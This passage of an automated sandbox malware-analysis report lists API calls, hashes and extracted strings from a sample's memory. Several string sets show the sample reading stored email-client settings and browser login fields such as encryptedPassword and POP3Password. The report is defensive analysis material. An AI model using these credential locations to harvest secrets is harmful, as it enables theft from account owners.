                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4165544737-0
                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                    APIs
                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,75B4EB20,?,00000000), ref: 00402533
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                    • API String ID: 168965057-606283353
                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2998058495-0
                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                    • API String ID: 231171946-2189169393
                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 633282248-1996832678
                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
